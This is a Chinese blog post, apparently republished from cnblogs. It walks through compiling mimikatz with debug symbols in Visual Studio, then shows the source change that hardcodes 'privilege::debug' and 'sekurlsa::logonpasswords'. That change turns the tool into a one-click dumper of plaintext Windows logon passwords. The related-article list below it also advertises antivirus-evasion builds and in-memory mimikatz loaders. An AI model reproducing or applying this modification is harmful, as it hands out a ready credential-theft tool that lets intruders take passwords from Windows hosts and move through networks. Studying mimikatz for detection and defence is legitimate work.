【源码阅读】VS调试mimikatz-改造法国神器mimikatz执行就获取明文密码

最新推荐文章于 2023-06-23 16:56:26 发布
最新推荐文章于 2023-06-23 16:56:26 发布
阅读量1.3k 收藏
点赞数
文章标签: java
原文链接:http://www.cnblogs.com/17bdw/p/8321622.html
版权

0x1 概要

记得某位同学提起在XXX得到了一个一键生成明文的工具,觉得很是神奇。。。

然而我一看图标就知道是mimikatz,这工具是开源的,只要改两行代码就可以实现写死命令了。

顺带讲讲编译过程中的问题和解决方法。

0x2 详情

调试这个工具的时候,发现新版本没生成debug模式的选项,F11调试没有对应到源代码。仔细一看原来是没有生成调试文件。

549050-20180120184826584-1094233130.png

设置让Release的程序也生成pdb文件即可。

另外mimikatz没有debug版,所以导致有些参数被优化了。没有办法跟进具体的变量和函数,所以还需要把以下选项调成Debug模式可用的设置。

549050-20180121060142318-376950887.png

549050-20180121060148990-732576684.png

0x3 修改

原来的代码是程序没有接收到退出信号,就卡在循环里,直到用户输入命令然后执行,既然已经知道原理就写死命令即可实现我想要的功能。

找到以下代码:

#ifndef _WINDLL
        while (status != STATUS_FATAL_APP_EXIT)
        {
                kprintf(L"\n" MIMIKATZ L" # "); fflush(stdin);
                if(fgetws(input, ARRAYSIZE(input), stdin) && (len = wcslen(input)) && (input[0] != L'\n'))
                {
                        if(input[len - 1] == L'\n')
                                input[len - 1] = L'\0';
                        kprintf_inputline(L"%s\n", input); //获取参数
                        status = mimikatz_dispatchCommand(input);
                }

        }
#endif
        mimikatz_end();
        return STATUS_SUCCESS;

修改后的代码:

#ifndef _WINDLL
        while (status != STATUS_FATAL_APP_EXIT)
        {
                //kprintf(L"\n" MIMIKATZ L" # "); fflush(stdin);
                //if(fgetws(input, ARRAYSIZE(input), stdin) && (len = wcslen(input)) && (input[0] != L'\n'))
                //{
                //        if(input[len - 1] == L'\n')
                //                input[len - 1] = L'\0';
                //        kprintf_inputline(L"%s\n", input); //获取参数
                //        status = mimikatz_dispatchCommand(input);
                //}
                //提权
                status = mimikatz_dispatchCommand(L"privilege::debug");
                //获取密码
                status = mimikatz_dispatchCommand(L"sekurlsa::logonpasswords");
                status = STATUS_FATAL_APP_EXIT;
        }
#endif
        mimikatz_end();
        return STATUS_SUCCESS;

0x4 效果

549050-20180125011252131-685495306.png

0x5 参考

vs:Release版本和Debug版本的区别以及转换

http://blog.csdn.net/hust_sheng/article/details/49964217

转载于:https://www.cnblogs.com/17bdw/p/8321622.html

weixin_30501857
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mimikatz使用以及源码动态分析
weixin_46956745的博客
05-08 2952
mimikatz使用以及源码分析 文章目录mimikatz使用以及源码分析前言一、mimikatz安装运行二、mimikatz源码分析1.函数具体功能2.函数源码分析(动态)总结 前言 Mimikatz法国人 Gentil Kiwi 编写的一款 windows 平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取 windows 处于 active 状态账号的明文密码mimikatz 的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz
mimikatz源代码
04-11
最新版的mimikatz的源代码
神器 mimikatz - 直接抓取 Windows 明文密码
oceanark的博客
07-13 7471
昨天有朋友发了个法国佬写的神器叫 mimikatz让我们看下 神器下载地址: http://blog.gentilkiwi.com/mimikatz 还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章 http://pentestmonkey.net/blog/mimikatz-tool-to-recover-clear
Mimikatz 法国神器
weixin_30872499的博客
11-03 236
0x00 标准模块 Module : standardFull name : Standard moduleDescription : Basic commands (does not require module name) exit - Quit mimikatz cls - Clear screen (doesn't work wi...
源码阅读Mimikatz相关资料
weixin_30843605的博客
01-25 318
Mimikatz GitHub (源码) https://github.com/gentilkiwi/mimikatz Mimikatz GitHub Wiki (包含了一些说明文档) https://github.com/gentilkiwi/mimikatz/wiki GentilKiwi Blog (博客里的大多数内容是用法语写的,请使用 Chrome 浏览器进行自动翻译) ht...
mimikatz-master源码
07-22
mimikatz-master
获取Windows明文密码mimikatz2.2-x64.rar
03-19
"privilege::debug"是Mimikatz的一个命令,用于获取调试权限,这是执行许多高级操作,包括获取密码,所必需的权限。"sekurlsa::logonpasswords"则是Mimikatz的另一个关键命令,用于从LSA(Local Security Authority ...
MrWQ#vulnerability-paper#powershell + Invoke-Mimikatz-ps1 获取系统密码
07-25
(1)目标主机具备网络环境 (2)目标主机不具备网络环境 (3)把文件下载到目标主机进行执行
mimikatz-2.2.0-20220919.zip
01-06
这个压缩包“mimikatz-2.2.0-20220919.zip”包含了最新版本的mimikatz程序,发布日期为2022年9月19日。 1. **mimikatz核心功能** - **密码提取**:mimikatz可以提取Windows系统的内存中明文密码,包括SAM数据库、...
mimikatz-trunk(2.2.0 20190512 Windows 10 1903).zip
最新发布
01-06
mimikatz-trunk(2.2.0 20190512 Windows 10 1903):Windows安全与密码提取工具解析》 mimikatz-trunk是一款知名的Windows系统安全工具,其版本为2.2.0,发布日期为2019年5月12日,特别针对Windows 10 1903版进行...
mimikatz2.0和源码
06-26
解压密码:novirus,由于是黑客工具,所以杀毒软件可能会报毒,使用时请添加信任或者暂时关闭实时扫描,另附上项目源代码,供大家分享
法国神器mimikatz源码.rar
03-24
读取windows密码源码,支持win7,win8
Mimikatz-Csharp
05-08
原理     通过反射PE注入将mimikatz加载到内存运行。 如何更新代码中Mimikatz版本     先把mimikatz.exe或者其他文件转换成896行需要的编码格式,之后替换896行代码块就ok。具体如何转成需要的格式,在katz2.cs代码820行可以看到。 生成key.snk方式     不管编译exe还是dll,都需要先生成key.snk, $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP
cpp-mimikatz是作者学习C并进行Windows安全实验的工具
08-16
mimikatz是作者学习C并进行Windows安全实验的工具
mimikatz2 0 最新 一键版
05-04
mimikatz2 0 最新 一键版 源码编译 32位 64位
艰难的mimikatz源码编译免杀 Windows Defender
crowsec
01-25 2751
本文mimikatz源码编译未能免杀Windows Defender,后面使用的是其他的方式,思路和源代码暂不公开,希望师傅们能够理解!
【免杀】mimikatz源码+特征码
zhangshuaiijie的博客
06-23 1809
关于免杀网络上的信息对新手来说相对少很多,不是看不懂就是压根不能用,这也算是一个记录吧,我也不敢保证能不能成功。
源码阅读Mimikatz一键获取远程终端凭据与获取明文密码修改方法
17bdw的编程备份笔记
02-16 80
1、前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路。 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: NTSTATUS mimikatz_doLocal(wchar_t * input) { NTSTATUS status = STATUS_SUCCESS; // 参数个数定义 ...
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
03-22
L0phtCrack和mimikatz都是用于获取Windows系统密码的工具,但它们的工作原理不同。L0phtCrack是一款密码破解软件,它通过暴力破解、字典攻击等方式获取密码。而mimikatz则是一款密码抓取工具,它可以直接从Windows系统内存中获取明文密码。因此,L0phtCrack获取密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack需要对密码进行破解,可能会被系统检测到并触发安全警报,而使用mimikatz则可以在不留下痕迹的情况下获取密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值